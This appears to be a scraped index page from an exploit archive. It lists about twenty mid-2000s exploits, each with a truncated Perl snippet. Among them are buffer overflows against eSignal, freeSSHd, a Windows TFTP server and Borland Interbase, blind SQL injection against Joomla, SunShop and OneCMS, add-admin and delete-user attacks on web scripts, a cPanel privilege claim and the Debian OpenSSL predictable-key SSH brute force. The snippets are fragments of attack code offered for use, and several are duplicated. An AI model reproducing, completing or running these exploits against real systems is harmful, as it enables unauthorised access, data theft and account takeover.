eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl eSignal v7.6 remote exploit c VizibleSoft == http://viziblesoft.com/insect 25-mAR-2004 use IO::Socket; sub usage die"\nUsage: perl $0 host port\n"; print "\r\neSignal v7.6 remote exploit, c VizibleSoft.com\r\n"; my $ip = $ARGV0 || usage; my $port ...

Joomla! Component JooBlog 0.1.1 - Blind SQL Injection

!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " \n"; print " Joomla Component JooBlog Blind SQL Injection Exploit \n"; print " Author:His0k4 ALGERIAN HaCkeR \n"; print " \n"; print " Conctact: His0k4.hlmatgamil.com \n"; print " Greetz: All friends & muslims...

freeSSHd 1.2.1 - (Authenticated) Remote Stack Overflow (PoC)

FreeSSHD remote Buffer Overflow Website: http://freesshd.com/ Version:1.2.1 Bug: Remote Buffer Overflow CD First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=00000000 ecx=41414141 edx=00150608 esi=00c268f0 edi=00c268f0...

PHP Booking Calendar 10 d Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ====================================================== PHP Booking Calendar 10 d Remote SQL Injection Exploit ====================================================== Portal :PHP Booking Calendar 10 d sql/upload Exploit Modified 2008 exploit...

cpanel-root.txt

By : Ali Jasbi IHST security & hacking Research team WwW.Hackerz.ir Vendor : Cpanel.net Version : ALL !! Risk : Very high What u can do with this bug is : u can have a access to all the server with reseller privilege Th3 r00t how it's work ? when u want to create an account in shell what will...

phpagtc-admin.txt

!/usr/bin/perl Note: adduser.php is accessable to a guest/any-user, but if you access through a browser you cant add admin, theres a hidden POST buried in the script, which contains the userlevel. Note: alot of sites run this script and they remove the "powered by" dork. Also you can get access t...

mypicgallery-admin.txt

!/usr/bin/perl use strict; use LWP::UserAgent; print "-+-- MyPicGallery 1.0 Arbitrary Add-Admin Exploit --+-\n"; print "-+-- Discovered && Coded By: t0pP8uZz --+-\n"; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n"; print "-+-- MyPicGallery 1.0 Arbitrary Add-Admin Exploit...

MyPicGallery 1.0 Arbitrary Add-Admin Exploit

No description provided by source. !/usr/bin/perl use strict; use LWP::UserAgent; print "-+-- MyPicGallery 1.0 Arbitrary Add-Admin Exploit --+-\n"; print "-+-- Discovered && Coded By: t0pP8uZz --+-\n"; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n"; print "-+-- MyPicGallery 1....

MeltingIce File System <= 1.0 Remote Arbitrary Add-User Exploit

No description provided by source. !/usr/bin/perl use strict; use LWP::UserAgent; NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of...

meltingice-user.txt

!/usr/bin/perl use strict; use LWP::UserAgent; NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registratio...

Debian generated SSH-Keys working exploit

Hi Securityfocus, the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It...

SunShop Version 3.5.1 Remote Blind Sql Injection

!/usr/bin/perl -w use LWP::UserAgent; scripts : SunShop Version 3.5.1 Remote Blind Sql Injection scripts site : http://www.turnkeywebtools.com/sunshop/ Discovered By : irvian site : http://irvian.cn email : [email protected] print "rn+-----------------------------------------+rn"; print "+Bli...

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

Exploit for multiple platform in category remote exploits ====================================================== Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit ====================================================== the debian openssl issue leads that there are only 65.536 possible ssh key...

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a key...

Advanced Image Hosting (AIH) 2.1 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= Advanced Image Hosting AIH 2.1 Remote SQL Injection Exploit ============================================================= !/usr/bin/perl -w Advanced Image Host Script Powered by...

TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================== TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit ========================================================== !/usr/bin/perl TFTPServer SP v1.4 for Windows remote .bss...

OneCMS 2.5 - Blind SQL Injection

OneCMS 2.5 - Blind SQL Injection !/usr/bin/perl OneCMS 2.5 Remote Blind SQL Injection Exploit Author : Cod3rZ Site : http://cod3rz.helloweb.eu Site : http://devilsnight.altervista.org Usage : perl oc.pl site There's many other bugs, find them yourself use LWP::UserAgent; use HTTP::Request::Common...

joomlaalpha-blindsql.txt

!/usr/bin/perl eSploit Framework - Inphex use Digest::MD5 qwmd5 md5hex md5base64; use LWP::UserAgent; use HTTP::Cookies; use Switch; $host = shift; $path = shift; $id = shift; $nonfind = shift; choose anything thats inside the article of id $column = "username"; change if needet $table =...

Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)

POC.pl !/usr/bin/perl -w Author: Liu Zhen Hua use IO::Socket; use strict; my $host=$ARGV0; sub usage print "usage: perl poc.pl serverip\n"; if $ARGV newProto='tcp', PeerAddr=$host, PeerPort=3050; my $pad0 = "\x41"x1000; "\x00\x00\x03\xE8" my $pad5 = "\x43"x16; my $exploit =...

prozilla-delete.txt

--==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: ...